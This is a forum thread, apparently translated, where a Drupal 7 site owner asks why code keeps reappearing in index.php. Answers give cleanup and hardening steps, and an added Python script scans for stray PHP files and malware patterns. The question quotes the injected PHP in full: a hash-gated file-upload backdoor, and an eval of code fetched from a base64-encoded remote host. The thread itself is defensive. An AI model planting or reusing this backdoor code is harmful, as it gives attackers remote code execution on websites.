Drupal
Konstantin, 2018-04-09 06:35:49

How to catch a virus on a Drupal 7 website?

It all started very suddenly: in some miraculous way, this code gets injected into index.php:

ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
  move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
  eval(file_get_contents(base64_decode('aHR0cDovLzAyby5vcmcvdy8/dT0=').$sh.'&c='.$c));
}

All suspicious modules and folders were removed. But it didn't get better, and this code periodically gets injected again. I did not find any shells, or any changes to files and folders either.


5 answer(s)
Boris Syomov, 2018-04-09
@kotomyava

0. Always update in a timely manner.
1. Remove all contributed modules and core, and reinstall them from drupal.org.
2. Check whether there are any extra users with elevated permissions.
3. Check whether php_filter is used; if it is used anywhere, rework that and disable it completely. Also, if users are allowed to publish content, check that the most restrictive input filters are used.
4. Audit custom modules, if any, and themes.
5. If possible, disable the execution of PHP scripts in the sites/*/files folder at the web server configuration level (not .htaccess).
6. If possible, make sure that the user the web server runs as has write access only to sites/*/files and a temporary folder outside the site root, and do all updates through drush, for example, running as the owner of the files.

SunHere, 2018-05-03
@SunHere

Drupal gets hacked often these days, and it has plenty of vulnerabilities. It is quite possible that you are missing something, and it is through the one remaining virus file that everything reappears.

xmoonlight, 2018-04-09
@xmoonlight

How to protect websites from hacking?

afi13, 2018-04-09
@afi13

0. Make a full site backup (files + database)
1. Use the hacked module to find modified files https://www.drupal.org/project/hacked
2. Check that there are no stray PHP files unrelated to Drupal (they can be uploaded into any module).
3. Check all nodes, blocks, users, fields, etc. If this is not possible manually, then some kind of script is needed.
4. Check users and their roles. Both rogue users and rogue roles can be added in Drupal.
5. Update Drupal and all modules to the latest version https://www.drupal.org/project/drupal/releases/7.58
6. Change admin passwords
See details here: https://www.drupal.org/docs/develop/security/your-...
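
As an added example (not part of any post in this thread), the check for stray PHP files in step 2, combined with a search for the constructs visible in the snippet from the question, can be scripted as below. The indicator names, the extension list and the sample tree built by demo() are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# Extensions Drupal 7 or a typical web server treats as PHP (assumed list).
PHP_EXT = {".php", ".phtml", ".php5", ".inc", ".module", ".install"}

# Constructs taken from the injected snippet quoted in the question.
INDICATORS = {
    "remote-eval": re.compile(
        rb"eval\s*\(\s*file_get_contents\s*\(\s*base64_decode", re.I),
    "upload-to-post-path": re.compile(
        rb"move_uploaded_file\s*\([^;]*\$_POST", re.I),
}

def scan(root):
    """Return sorted (relative_path, finding) pairs for a Drupal docroot."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in PHP_EXT:
            continue
        rel = path.relative_to(root)
        # Anything PHP under sites/<site>/files is suspect: uploads only.
        if len(rel.parts) > 3 and rel.parts[0] == "sites" and rel.parts[2] == "files":
            findings.append((rel.as_posix(), "php-in-files-dir"))
        data = path.read_bytes()
        for name, rx in INDICATORS.items():
            if rx.search(data):
                findings.append((rel.as_posix(), name))
    return sorted(findings)

def demo():
    """Build a small constructed tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "sites/default/files/img").mkdir(parents=True)
        (root / "modules/node").mkdir(parents=True)
        # Constructed sample; the base64 string is a placeholder, not a URL.
        (root / "index.php").write_text(
            "<?php\nmove_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);\n"
            "eval(file_get_contents(base64_decode('Q09OU1RSVUNURUQ=').$sh));\n")
        (root / "sites/default/files/img/cache.php").write_text("<?php echo 1;\n")
        (root / "sites/default/files/img/logo.png").write_bytes(b"\x89PNG")
        (root / "modules/node/node.module").write_text("<?php function node_help() {}\n")
        return scan(root)

if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{finding:22} {rel}")
```

A clean result only rules out these specific patterns; comparing the tree against pristine drupal.org sources, as the hacked module from step 1 does, covers modifications that match no signature.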

Alexander Alexandrov, 2018-04-11
@BraveHeart

Try to scan with the ai-bolit script (or similar), it will show where the shells are. Then update completely and change passwords.
